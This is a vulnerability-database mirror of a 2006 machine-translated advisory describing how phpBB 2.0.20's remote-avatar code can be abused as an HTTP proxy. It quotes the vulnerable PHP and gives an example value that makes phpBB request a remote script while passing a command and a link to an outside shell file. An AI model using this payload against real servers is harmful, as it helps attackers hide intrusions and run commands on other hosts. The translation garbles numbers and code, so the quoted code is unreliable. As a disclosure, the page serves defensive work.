Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
myhack58佚名MYHACK58:6220069344
HistoryMay 26, 2006 - 12:00 a.m.

phpBB can be used as HTTP proxy with vulnerability-vulnerability warning-the black bar safety net

2006-05-2600:00:00
佚名
www.myhack58.com
19
JSON

Affected system:
phpBB Group phpBB 2.0.20
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 1 7 9 6 5

phpBB is a PHP language implementation of a Web-based open source Forum program, the use of more widely. It supports multiple databases as backend such as Oracle, MSSQL, MySql, PostGres, and so on.

phpBB on the user request processing on the presence of input validation vulnerabilities, a remote attacker could exploit this vulnerability in the phpBB server as the HTTP proxy used to hide the CGI attack the real source.

In phpBB usercp_avatar. php file 1 2 5-1 5 row 3:


if ( $avatar_mode == remote && \
preg_match(/^(http://)? ([\w\-\.]+):? ([0-9])/(.)$/, $avatar_filename, \
$url_ary) ) {
if ( empty($url_ary[4]) )
{
$error = true;
$error_msg = ( ! empty($error_msg) ) ? $error_msg .
. \
$lang[Incomplete_URL] : $lang[Incomplete_URL]; return;
}

$base_get = / . $url_ary[4];
$port = ( ! empty($url_ary[3]) ) ? $url_ary[3] : 8 0;

if ( ! ($fsock = @fsockopen($url_ary[2], $port, $errno, $errstr)) )
{
$error = true;
$error_msg = ( ! empty($error_msg) ) ? $error_msg .
. \
$lang[No_connection_URL] : $lang[No_connection_URL]; return;
}

@fputs($fsock, “GET $base_get HTTP/1.1\r\n”);
@fputs($fsock, “HOST:” . $url_ary[2] . “\r\n”);
@fputs($fsock, “Connection: close\r\n\r\n”);

unset($avatar_data);
while( !@ feof($fsock) )
{
$avatar_data .= @fread($fsock, $board_config[avatar_filesize]);
}
@fclose($fsock);

phpBB does not check the user-provided value is based on the graphical extension the end, also did not check the supplied string contains“&”and“?” Character, thus the attacker can submit the similar to the following values:

http://some_vulnerable.host/somescript.php?cmd=ls%20-la&xpl=http://somehost/someshell.txt

phpBB will perform the following GET request:

GET /somescript. php? cmd=ls%2 0-la&xpl=http://somehost/someshell.txt HTTP/1.0
HOST: some_vulnerable. host
Connection: close

So phpBB will be used as a HTTP proxy to access the other’sthe Web server.

<*source: rgod ([email protected]

Links: http://marc.theaimsgroup.com/?l=bugtraq&amp;m=1 1 4 7 4 6 9 0 5 8 0 5 3 4 1&w=2
http://marc.theaimsgroup.com/?l=bugtraq&amp;m=1 1 4 7 7 1 0 8 2 4 0 4 4 8 3&w=2
*>

Recommendations:
--------------------------------------------------------------------------------
Manufacturers patch:

phpBB Group
-----------
The current vendor has not provided the patch or upgrade process, we recommend the use of this software users follow the manufacturer’s home page to get the latest version:

http://www.phpbb.com/

JSON